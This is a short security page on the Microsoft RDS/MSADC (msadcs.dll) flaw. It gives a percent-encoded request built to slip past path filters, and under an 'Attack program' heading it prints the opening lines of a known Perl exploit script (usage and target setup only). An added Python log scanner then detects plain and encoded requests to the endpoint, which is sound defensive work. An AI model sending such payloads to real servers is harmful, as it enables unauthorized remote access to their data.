CGI vulnerability (31): remote access to ODBC over the web, gaining control of the system.

If /msadc/msadcs.dll/ under the web directory is accessible, then any of Microsoft's patches may be useless. A request such as:

/%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset

bypasses the security mechanism and makes an illegitimate VBBusObj request, which achieves the intrusion.

Attack program:

```perl
# Save the section below as a txt file, then: "perl -x filename"
#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

# Print usage and exit unless a host (-h) or a resume (-R) was given
if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h { -d -X -v }
	-h = host you want to scan (ip or domain)
	-d = delay between calls, default 1 second
	-X = dump Index Server path table, if available
	-v = verbose
	-e = external dictionary file for step 5

	Or a -R will resume a command session

~; exit;}

# $|=1 turns off output buffering
$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
# Append a trailing dot to host names, then resolve the target address
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
```
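The percent-encoded request above gets past any filter that matches the literal string /msadc/msadcs.dll, so a log check has to decode and normalize the path before comparing. The following is an added example, not part of the original page: a detection sketch that flags both plain and encoded requests to the RDS endpoint. The log lines are constructed, the function names are hypothetical, and decoding up to three rounds is a conservative assumption to also catch double encoding.

```python
import posixpath
import re
from urllib.parse import unquote

RDS_PATH = "/msadc/msadcs.dll"  # endpoint named on the page, compared in lower case

# Constructed sample access-log lines (documentation IP range, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.11 - - [01/Jan/2000:10:00:05 +0000] "POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetRecordset HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Jan/2000:10:00:09 +0000] "POST /%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset HTTP/1.0" 200 512',
    '192.0.2.13 - - [01/Jan/2000:10:00:12 +0000] "GET /%256Dsadc/msadcs.dll HTTP/1.0" 200 120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')


def normalize_path(raw, max_rounds=3):
    """Return the path as the server would resolve it: decoded, slash-folded, lower case."""
    path = raw.split("?", 1)[0]
    for _ in range(max_rounds):          # repeat to unwrap double encoding
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = re.sub(r"/+", "/", path.replace("\\", "/"))
    return posixpath.normpath(path).lower()   # also collapses ./ and ../ segments


def classify(raw_path):
    """Return a finding dict if raw_path reaches the RDS endpoint, else None."""
    norm = normalize_path(raw_path)
    if norm != RDS_PATH and not norm.startswith(RDS_PATH + "/"):
        return None
    # The literal path is missing from the raw request: it was encoded to evade matching.
    obfuscated = RDS_PATH not in raw_path.lower()
    return {"path": norm, "obfuscated": obfuscated}


def scan(lines):
    """Return (line_number, finding) for every request that hits the RDS endpoint."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        finding = classify(match.group(1)) if match else None
        if finding:
            hits.append((number, finding))
    return hits


if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, finding)
```

A hit with `obfuscated` set deserves higher priority than a plain one, since a legitimate RDS client has no reason to encode letters in the path.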